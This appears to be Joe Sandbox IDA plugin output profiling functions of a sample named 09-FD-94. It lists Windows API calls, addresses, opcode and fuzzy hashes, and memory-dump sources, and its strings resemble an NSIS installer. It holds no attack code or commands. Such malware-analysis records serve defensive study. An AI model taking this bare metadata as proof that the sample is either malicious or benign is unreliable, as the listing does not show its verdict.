                                                                            • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                                            • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                                            • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                                            • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                            • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                            • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                            • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403192
                                                                              • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                            • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                            • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?), ref: 0040327F
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$CountTickWrite
                                                                            • String ID:
                                                                            • API String ID: 2146148272-0
                                                                            • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                            • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                                            • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                            • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                                            APIs
                                                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                            • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValuelstrlen
                                                                            • String ID:
                                                                            • API String ID: 1356686001-0
                                                                            • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                            • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                                            • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                            • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                                            APIs
                                                                              • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0,00434000), ref: 00405A4C
                                                                              • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                                              • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015E3
                                                                            • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015FD
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,?), ref: 00401630
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3751793516-0
                                                                            • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                                            • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                                            • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                                            • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                            • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                              • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                            • String ID:
                                                                            • API String ID: 1404258612-0
                                                                            • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                            • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                                            • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                            • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                                            APIs
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                              • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                                              • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                              • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                              • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                                            • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 3585118688-0
                                                                            • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                                            • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                                            • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                                            • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405195
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                                              • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                            • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                                            • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                            • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405C01
                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: nsa
                                                                            • API String ID: 1716503409-2209301699
                                                                            • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                            • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                                            • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                            • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                            • CloseHandle.KERNEL32(?), ref: 004056F5
                                                                            Strings
                                                                            • Error launching installer, xrefs: 004056D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                            • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                                            • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                            • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                            • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                                            • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                            • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                            • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                                            • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                            • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                            • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                                            • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                            • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                            • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                                            • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                            • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                            • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                                            • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                            • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                            • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                                            • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                            • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                            • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                                            • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                            • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                            • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                                            • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                                            • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                            • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                                            • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                            • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9